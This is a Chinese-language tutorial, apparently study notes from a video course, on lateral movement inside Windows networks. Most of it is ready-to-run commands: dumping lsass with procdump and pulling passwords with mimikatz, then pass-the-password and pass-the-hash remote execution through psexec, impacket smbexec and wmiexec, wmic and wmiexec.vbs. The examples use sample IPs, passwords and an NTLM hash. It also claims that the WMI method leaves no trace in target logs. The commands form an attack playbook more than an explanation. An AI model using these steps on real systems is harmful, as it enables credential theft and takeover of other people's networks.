内网安全：横向传递攻击.

横向移动就是在拿下对方一台主机后，以拿下的那台主机作为跳板，对内网的其他主机再进行后面渗透，利用既有的资源尝试获取更多的凭据、更高的权限，一步一步拿下更多的主机，进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.（传递攻击主要建立在明文和Hash值获取基础上进行攻击.）

---

目录：

内网安全：横向传递攻击.

Procdump+Mimikatz 配合获取目标主机密码：

SMB 服务利用（psexec || smbexec）

psexec 利用：

smbexec 利用：

WMI 服务利用.（wmic ||cscript || wmiexec）

（1）自带 WMIC 明文传递 无回显.

（2）自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

（3）套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本

---

Procdump+Mimikatz 配合获取目标主机密码：

下载procdump工具：https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载Mimikatz工具：https://github.com/gentilkiwi/mimikatz/releases

想方法把 procdump 上传在目标主机上.

然后执行这个命令，生成一个 lsass.dmp 文件.（再把他下载在我们主机上进行分析）

procdump -accepteula -ma lsass.exe lsass.dmp

在 mimikatz 上执行：

（1）privilege::debug

（2）sekurlsa::minidump lsass.dmp

（3）sekurlsa::logonPasswords full

---

SMB 服务利用（psexec || smbexec）

利用 SMB 服务可以通过明文或 hash 传递来远程执行，条件 445 服务端口开放.

工具下载：https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec 利用：

（1）Psexec第一种：先有 ipc 链接，psexec 需要明文或 hash 传递.

net use \\192.168.0.101\ipc$ "admin" /user:Administrator        // ipc 链接

net use \\目标主机的 IP 地址\ipc$ "目标密码" /user:目标账号

psexec \\192.168.0.101 -s cmd        //-s 以 System 权限运行

psexec \\目标主机 IP 地址 -s cmd

---

（2）Psexec 第二种：不用建立 IPC 直接提供明文账户密码.[推荐使用]

psexec \\192.168.0.101 -u administrator -p admin -s cmd    // 使用明文连接

psexec \\目标主机 IP 地址 -u 账号 -p 密码 -s cmd

密文是在哪收集的.

impacket 工具下载：https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip

直接执行是不行的，所以需要使用impacket工具.

psexec -hashes :哈希值密码 ./账号@目标 IP 地址(组)
psexec -hashes :哈希值密码 域名/账号@目标 IP 地址(域)

psexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./Administrator@192.168.0.101

---

smbexec 利用：

smbexec 无需先 ipc 链接 明文或 hash 传递.【使用 impacket 工具】

（1）smbexec god/administrator:admin@192.168.0.101    （域名的连接）

    #smbexec 域名/账号:密码@目标的IP地址
    
（2）smbexec ./administrator:admin@192.168.0.101     （组的连接）

    #smbexec ./账号:密码@目标的IP地址

（3）smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101

    #smbexec -hashes :密文 ./账号@目标的IP地址

（4）smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 god/administrator@192.168.0.101

    #smbexec -hashes :密文 域名/账号@目标的IP地址

---

WMI 服务利用.（wmic ||cscript || wmiexec）

WMI 服务是通过 135 端口进行利用，支持用户名明文或者 hash 的方式进行认证，并且该方法不会在
目标日志系统留下痕迹.

（1）自带 WMIC 明文传递 无回显.

wmic /node:192.168.0.101 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >C:\1.txt"

---

（2）自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

cscript //nologo wmiexec.vbs /shell 192.168.0.101 administrator admin

cscript //nologo wmiexec.vbs /shell 目标IP地址 账号 密码

---

（3）套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin@192.168.0.101 "whoami"        【文明连接】

wmiexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101 "whoami"
【密文连接】

wmiexec ./账号:密码@目标主机的IP地址 "你想要回显信息的命令"【组】

wmiexec 域名/账号:密码@目标主机的IP地址 "你想要回显信息的命令"【域】

     

       

      

学习链接：第67天：内网安全-域横向smb&wmi明文或hash传递_哔哩哔哩_bilibili